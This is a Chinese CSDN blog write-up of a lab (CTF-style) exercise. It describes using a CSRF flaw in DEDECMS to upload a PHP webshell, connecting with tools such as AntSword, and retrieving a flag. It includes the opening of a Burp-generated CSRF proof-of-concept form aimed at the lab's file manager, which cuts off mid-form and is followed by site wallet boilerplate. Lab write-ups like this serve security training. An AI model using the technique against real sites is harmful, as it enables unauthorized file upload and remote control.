掌控者靶场CSRF跨站伪造请求

本文详细介绍了如何在掌控者靶场中利用CSRF(跨站请求伪造)漏洞进行文件上传,并通过PHP后门进行远程控制。在过程中遇到了编码问题导致的404错误,通过调整PHP代码的编码方式成功解决了问题,最终通过蚁剑连接并获取到Flag。
摘要由CSDN通过智能技术生成

0x01 前言

这是掌控者靶场-训练营-漏洞组合利用靶场的第2道题。主要是利用CSRF跨站请求漏洞,上传php木马,再通过菜刀、蚁剑、哥斯拉等工具,连接php后门,通过题干,找到Flag。

0x02 CSRF跨站请求伪造

Cross-site request forgery,简称为CSRF,说直白点就是伪造请求、欺骗点击、达成目的。

图片引用自百度图片,若有侵权请联系我删除,3Q。

0x03 利用过程及踩坑

从传送门直达目标站点,可以看到是DEDECMS,网站下方给出了对应版本信息,可通过在本地搭建环境,通过burp抓取上传文件动作,转换为CSRF跨站脚本,这里直接提供靶场环境的:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id="aa" action="http://59.63.200.79:8022/csrf/dede/file_manage_control.php" method="POST">
      &
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值